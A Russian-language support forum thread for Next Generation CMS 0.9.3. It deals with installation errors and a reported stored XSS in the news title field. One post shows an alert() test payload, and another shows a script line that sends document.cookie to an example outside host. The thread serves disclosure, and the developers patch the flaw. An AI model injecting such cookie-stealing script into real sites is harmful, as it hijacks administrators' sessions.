Версия 0.9.3 Release

legenda · 2012-04-14 00:14:32

У меня 0.9.3 Release [SVN954+] и там все по старому( (т.е. 1,4)

vitaly · 2012-04-14 00:44:57

legenda, изменения сделаны в SVN970.
Обновись до него, зайди в настройки формата адресов и просто нажми на "сохранить".
Должно исправиться.

legenda · 2012-04-14 02:52:13

vitaly, ок, правда сначала надо все почитать что там еще изменено

Евгений · 2012-04-14 16:23:11

Вот, начал установку версии из SVN:

и вот еще в конце нету ссылки на страницу входа в админку, вобще думаю что можно было бы убрать всю техническую информацию под спойлер, и сделать две кнопки, одна для перехода на главную страницу сайта, другая для перехода в админку.

Изменено Евгений (2012-04-14 16:28:45)

helljoy · 2012-04-16 20:49:19

При нажатии на кнопку "добавить статическую страницу" зависает процесс php. И админ панель виснет. Софт Apache/2.2.16 - php5-5.3.3-7+squeeze8.

vitaly · 2012-04-16 21:53:40

helljoy, скорее всего тупит какой-либо из SQL запросов.
Посмотри логи mysql'я.

helljoy · 2012-04-18 20:56:58

sql лог не показывает ошибку.. а вот апатч
Premature end of script headers: php, referer: http://домен.ком/engine/admin.php?mod=static
////////////// зы. php-mod CGI

mix0x0 · 2012-04-21 21:00:06

Продукт: Next Gen CMS
Версия: 0.9.3 Release [SVN880+FIX01]

Уязвимость: XSS Активные
При добавлении новости, уязвимы поля: "Заголовок", 'тестовый блог'

<script>alert(/xss/)</script>

Требуются права модератора или администратора

Knopik · 2012-04-22 09:11:30

legenda, наверно что то типа такого.

Допустим, ты дал права журналиста какому нибудь Васе, который в один момент создаст такую новость. Затем ты войдя в админку увидишь, что есть новости для модерации, нажмешь редактировать [n], увидишь что то типа этого. Поняв что это муссор, ты отмечаешь напротив них чекбоксы и внизу жмешь удалить. Показывается уведомление, что новость удалена, одновременно выполняться атака.

что если вася выпишет не безобидный алерт, ну а скажем что то типа такого

<script>var t = new Image(); t.scr="http://vasya.net.ru/cookie.php?"+document.cookie;</script>

legenda · 2012-04-23 00:25:03

Knopik, это что действительно так есть?

Knopik · 2012-04-23 16:40:24

legenda, да. у меня в локалке svn версия

irbees2008 · 2012-04-23 18:42:23

ну а защиту кто нибудь продумает?

infinity237 · 2012-04-23 19:07:15

Какую защиту-то? Вы сами несете ответственность, за свои действия.
Выдали права доступа - получайте.

vitaly · 2012-04-24 04:45:25

mix0x0, спасибо.
В SVN выложен патч.

dampel · 2012-04-25 02:00:03

А не подскажите когда планируется новая версия ngcms ?

legenda · 2012-05-14 21:39:57

Почемуто в самом конце инсталяции у меня вот такой вот облом

Fatal error: Cannot load DEFAULT permissions for users!

причем уже перепробовал и разные юзера.

0.9.3 Release [SVN954+]

qwas · 2012-05-19 19:13:59

Оффтоп: Всем здрасте))

legenda пишет:

Почемуто в самом конце инсталяции у меня вот такой вот облом
Fatal error: Cannot load DEFAULT permissions for users!
причем уже перепробовал и разные юзера.
0.9.3 Release [SVN954+]

У меня, как не странно, все стало на хостинге с первого раза...
Upd: пардон, не увидел сразу...у меня с сайта скачанная версия, не с SVN.

Изменено qwas (2012-05-19 19:15:35)

vitaly · 2012-05-19 23:25:20

legenda, проверь наличие файла engine/conf/perm.default.php

legenda · 2012-05-20 03:08:43

vitaly, такой файл есть

vitaly · 2012-05-20 14:30:03

legenda, а двиг при этом ставится и работает или нет?

legenda · 2012-05-20 17:35:11

Все сначала ставится но в самом конце инсталяции у меня вот такой вот облом, дальше ни админка ни сайт неработают

infinity237 · 2012-05-20 18:17:26

А чё вы собственно хотите? Если у вас даже инсталяция не проходит нормально?

legenda · 2012-05-20 23:05:26

infinity237, у кого это у вас? я ж написал четко что проблама возникает только при установке в 0.9.3 Release [SVN954+], а например релиз 0.9.3 Release [SVN880+FIX01] ставится нормально и ничего подобного нету.

vitaly · 2012-05-20 23:38:49

legenda пишет:

Все сначала ставится но в самом конце инсталяции у меня вот такой вот облом, дальше ни админка ни сайт неработают

Дай доступ по FTP к хостингу на котором это происходит, посмотрю.
Эту ошибку выводит функция loadPermissions(), но по-нормальному она этой ошибки (при наличии файла perm.default.php) выдавать не должна.

legenda · 2012-05-21 20:00:23

vitaly, файл engine/conf/perm.default.php должен быть до установки или после?

и ещк такой вопрос начиная с какой версии в корне появился файл syscron.php? и за что он отвечает?

Изменено legenda (2012-05-21 20:34:18)

Next Generation CMS :: Форум поддержки

Объявление

#326 2012-04-14 00:14:32

Re: Версия 0.9.3 Release

#327 2012-04-14 00:44:57

Re: Версия 0.9.3 Release

#328 2012-04-14 02:52:13

Re: Версия 0.9.3 Release

#329 2012-04-14 16:23:11

Re: Версия 0.9.3 Release

#330 2012-04-16 20:49:19

Re: Версия 0.9.3 Release

#331 2012-04-16 21:53:40

Re: Версия 0.9.3 Release

#332 2012-04-18 20:56:58

Re: Версия 0.9.3 Release

#333 2012-04-21 21:00:06

Re: Версия 0.9.3 Release

#334 2012-04-22 09:11:30

Re: Версия 0.9.3 Release

#335 2012-04-23 00:25:03

Re: Версия 0.9.3 Release

#336 2012-04-23 16:40:24

Re: Версия 0.9.3 Release

#337 2012-04-23 18:42:23

Re: Версия 0.9.3 Release

#338 2012-04-23 19:07:15

Re: Версия 0.9.3 Release

#339 2012-04-24 04:45:25

Re: Версия 0.9.3 Release

#340 2012-04-25 02:00:03

Re: Версия 0.9.3 Release

#341 2012-05-14 21:39:57

Re: Версия 0.9.3 Release

#342 2012-05-19 19:13:59

Re: Версия 0.9.3 Release

#343 2012-05-19 23:25:20

Re: Версия 0.9.3 Release

#344 2012-05-20 03:08:43

Re: Версия 0.9.3 Release

#345 2012-05-20 14:30:03

Re: Версия 0.9.3 Release

#346 2012-05-20 17:35:11

Re: Версия 0.9.3 Release

#347 2012-05-20 18:17:26

Re: Версия 0.9.3 Release

#348 2012-05-20 23:05:26

Re: Версия 0.9.3 Release

#349 2012-05-20 23:38:49

Re: Версия 0.9.3 Release

#350 2012-05-21 20:00:23

Re: Версия 0.9.3 Release

Подвал раздела